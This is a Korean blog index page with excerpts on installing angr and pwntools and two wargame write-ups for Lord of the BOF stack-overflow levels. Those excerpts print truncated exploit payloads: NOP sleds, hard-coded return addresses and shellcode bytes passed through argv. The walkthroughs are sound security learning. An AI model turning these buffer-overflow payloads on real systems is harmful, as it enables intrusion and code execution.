pwntools 설치! angr 설치 완료 후 pwntools까지 설치를 할꺼다우선 angr도 네트워크문제로 개뻘짓 했던터라..스냅샷을 먼저 찍어둔다 그리고 sudo apt-get install python2.7 python2.7-dev python-pip //여기까진 angr 설치했으면 설치돼있음 sudo pip install pwntools sudo apt-get install libcapstone-dev 끝 더보기 angr설치 먼저 한달에 한번씩 날려먹어서 빡치는 내 vmware ubuntu의 스냅샷을 찍어둔다..ssd에서 용량 부족으로 hdd로 옮겼더니 너무느리다......무튼..angr 설치를 시작해보자sudo apt-get update apt-get install python-dev libffi-dev build-essential virtualenvwrapper mkdir ~/.environments sudo find / -name "virtualenvwrapper.sh" //나온 path는 밑에 path에 넣어줌 echo source path >> ~/.bashrc echo export WORKON_HOME="~/.environments" >> ~/.bashrc source ~/.bashrc mkvirtualenv an.. 더보기 apt-get 서버 변겅경하기 sudo vi /etc/apt/sources.list vi상에서 : 누르고 %s/us.archive.ubuntu.com/ftp.daumkakao.com/r 실행.. 더보기 darkelf->orge 문제다. argv[0]이 77이 아니면 에러를 뱉어낸다.그래서 쫌 고민을 해봤더니..디렉토리를 77자리를 맞추거나 뭐 그런식으로 해야된다. .과 orge를 빼면 72라서 python 으로 /를 72개 출력하고 실행하면 argv error가 뜬다. 우선 정상작동이 된다. gdb로 보기위해 coredump를 할거다 gdb -q -c core 로 esp를 보면 이렇게 돼있다.argv[2]에 nop를 때려밖았으니 ret 주소를 argv[2]에 적당히 넣고 쉘코드를 때려박으면굿ㅋ 내 페이로드.`python -c 'print "/"*72'`orge `python -c 'print "\x90"*44+"\xc0\xf7\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x.. 더보기 wolfman->darkelf 개강을 기념하는 마음으로 오랫만에 풀어봤당.. 먼저 문제를 보면..달라진 부분은 argv[1]의 길이를 체크한다. 사실 큰 문제는 없다. argv[2]를 사용하면 되니까! 똑같이 풀어볼거다 gdb로 disas main을 보면.. 엄청 길다.버퍼의 사이즈는 2c(44byte), ret 4byte다.. break point 부분은 strcpy 한 다음부분에 걸고.. argv[1]에는 nop 44byte와 ret로 뛸 주소를 넣고.. argv[2]에 넣어야겠다. argv[2]에는 nop 1000개랑 쉘코드를 박을거다 shellcode는.. ./darkelf `python -c 'print "\x90"*44+"\x44\xfb\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\x.. 더보기 이전 1 2 3 4 ··· 7 다음
